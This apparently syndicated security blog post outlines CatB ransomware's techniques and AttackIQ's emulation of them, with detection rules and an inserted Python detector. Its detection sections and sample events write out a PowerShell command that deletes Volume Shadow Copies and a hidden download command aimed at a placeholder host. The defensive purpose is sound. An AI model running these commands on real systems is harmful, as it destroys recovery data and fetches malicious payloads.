
Emulating the Misleading CatB Ransomware – Source: securityboulevard.com


Source: securityboulevard.com – Author: Ayelen Torello

CatB ransomware, also known as CatB99 or Baxtoy, emerged in late 2022 and has gained attention for its use of DLL hijacking via Microsoft Distributed Transaction Coordinator (MSDTC) to execute its payload. It is suspected to be a rebrand of Pandora ransomware, as the notes share significant similarities. CatB is notable for its evasion tactics and the ability to detect and bypass virtual machine (VM) environments. In addition to encrypting files, it also attempts to steal browser data and credentials.

CatB has been linked to the suspected cyber espionage group ChamelGang (also known as CamoFei). According to SentinelOne, the group has deployed CatB ransomware in operations that impact high-profile organizations worldwide, likely aimed at distracting from its core espionage activities. The attribution of ransomware usage to actors such as ChamelGang reflects a shift in adversary behavior, indicating a growing trend of blending criminal tactics with espionage goals to obscure detection.

AttackIQ has released a new attack graph composed of several Tactics, Techniques and Procedures (TTPs) exhibited by CatB ransomware during its most recent activities, to help customers validate their security controls and their ability to defend against this sophisticated threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with CatB ransomware.
  • Assess their security posture against a ransomware family targeting organizations worldwide.
  • Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.

[Malware Emulation] CatB Ransomware – 2023-03 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of CatB ransomware on a compromised system, including discovery and encryption activities, to provide customers with the opportunity to detect and/or prevent a compromise in progress.

This emulation is based on SentinelOne’s report released on March 13, 2023, and supported by the technical analysis published by Fortinet in February 2023.

Initial Access & Discovery – Malware Delivery and VM Environment Checks

At this stage, the CatB dropper is deployed into the system to perform initial reconnaissance. It collects hardware and system drive information and uses the GlobalMemoryStatusEx API to gather details about the system’s physical and virtual memory.

Ingress Tool Transfer (T1105): This technique is covered by two separate scenarios, one that downloads the sample to memory and one that saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious content.

System Information Discovery (T1082): This scenario calls the GetSystemInfo Native API function to retrieve system hardware information. This can be used to detect sandboxes, create unique identifiers, and adjust execution behaviors.

System Information Discovery (T1082): This scenario calls the DeviceIoControl Native API function to retrieve system drive information, such as the serial number, to profile the target’s system.

System Information Discovery (T1082): This scenario executes the GlobalMemoryStatusEx Windows API call to gather information about physical and virtual memory.

Execution & Impact – Ransomware Execution and Encryption

At this stage, the CatB ransomware sample is deployed using DLL search order hijacking. It then terminates specific security-related processes to prepare the system for encryption. Afterward, it collects information from web browsers and proceeds to encrypt the victim’s files.

Hijack Execution Flow: DLL Search Order Hijacking (T1574.001): This scenario exploits Microsoft’s Dynamic-Link Library (DLL) search order to load a rogue DLL into a trusted system binary. By leveraging the trust placed in system binaries by administrators, malicious code can run undetected.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario simulates a threat actor using a PowerShell script to execute the taskkill command, aiming to terminate a specific process. This technique is often employed to disable security features on target assets.

Browser Information Discovery (T1217): This scenario leverages a PowerShell script to enumerate browser bookmarks, which can reveal personal information about users and internal network resources.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by CatB ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Deletion of Volume Shadow Copies is usually the first step that occurs, and it can be detected by looking at command line activity:

Process Name == powershell.exe
Command Line == "Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)"
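The two command-line signatures in this section (1a for T1105 and 2a for T1490), implemented here as an added example in Python over a handful of constructed process-creation events. This is not AttackIQ's code and not part of the original post; the `process` and `cmdline` field names are assumptions standing in for whatever your EDR or SIEM schema uses, and the T1490 check goes slightly beyond the post by using a case-insensitive regex match instead of an exact command-line equality, because a real command line carries the interpreter path and flags in front of the script text (and accepts braces as well as the parentheses written above).

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique id from the post
    cmdline: str     # offending command line, kept for the analyst


# Rule 1 (T1105, section 1a): cmd.exe or powershell.exe whose command line
# contains (IWR or Invoke-WebRequest) AND DownloadData AND Hidden.
_T1105_PROCS = {"cmd.exe", "powershell.exe"}
_T1105_ANY = ("iwr", "invoke-webrequest")
_T1105_ALL = ("downloaddata", "hidden")

# Rule 2 (T1490, section 2a): powershell.exe deleting shadow copies via WMI.
# Assumption: regex/substring match rather than the post's exact equality,
# accepting ( ) or { } around the ForEach-Object script block.
_T1490_PATTERN = re.compile(
    r"Get-WmiObject\s+Win32_ShadowCopy\s*\|\s*ForEach-Object\s*"
    r"[\(\{]\s*\$_\.Delete\(\)\s*;?\s*[\)\}]",
    re.IGNORECASE,
)


def _process_name(event):
    """Reduce a full image path (e.g. C:\\Windows\\System32\\cmd.exe) to its file name."""
    return event["process"].replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_t1105(event):
    """True when the event satisfies the Ingress Tool Transfer signature."""
    if _process_name(event) not in _T1105_PROCS:
        return False
    cl = event["cmdline"].lower()
    return any(k in cl for k in _T1105_ANY) and all(k in cl for k in _T1105_ALL)


def match_t1490(event):
    """True when the event satisfies the Inhibit System Recovery signature."""
    if _process_name(event) != "powershell.exe":
        return False
    return _T1490_PATTERN.search(event["cmdline"]) is not None


def scan(events):
    """Run both rules over a sequence of events and return the findings in order."""
    findings = []
    for ev in events:
        if match_t1105(ev):
            findings.append(Finding("T1105", ev["cmdline"]))
        if match_t1490(ev):
            findings.append(Finding("T1490", ev["cmdline"]))
    return findings


# Constructed sample events (not real telemetry; example.invalid and the
# angle-bracket tokens are placeholders, not a working download command).
SAMPLE_EVENTS = [
    # 0: ordinary admin activity, no rule should fire
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process | Sort-Object CPU"},
    # 1: hidden window + IWR + DownloadData launched through cmd.exe -> rule 1
    {"process": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell -WindowStyle Hidden -Command '
                '"IWR http://example.invalid/<stage2>; <client>.DownloadData(<...>)"'},
    # 2: routine Invoke-WebRequest without the other two tokens -> no alert
    {"process": "powershell.exe",
     "cmdline": 'powershell.exe -Command "Invoke-WebRequest https://example.invalid/update.json -OutFile update.json"'},
    # 3: shadow-copy deletion in the post's command-line form -> rule 2
    {"process": "powershell.exe",
     "cmdline": 'powershell.exe -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)"'},
    # 4: same text but the process is cmd.exe, so rule 2 (as written) stays silent
    {"process": "cmd.exe",
     "cmdline": "cmd.exe /c Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.technique}: {f.cmdline}")
```

Event 4 is worth keeping in the test set: the post scopes the T1490 rule to powershell.exe, so the same WMI text issued from another host process is a true negative for the rule as written, which is the kind of coverage gap a detection engineer should decide about deliberately rather than discover in an incident.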

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.

Wrap Up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against CatB Ransomware. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.


*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Ayelen Torello. Read the original post at: https://www.attackiq.com/2025/04/09/emulating-catb-ransomware/

Original Post URL: https://securityboulevard.com/2025/04/emulating-the-misleading-catb-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=emulating-the-misleading-catb-ransomware

Category & Tags: Malware, Security Bloggers Network, adversary emulation, Broad-Based Attacks, CatB
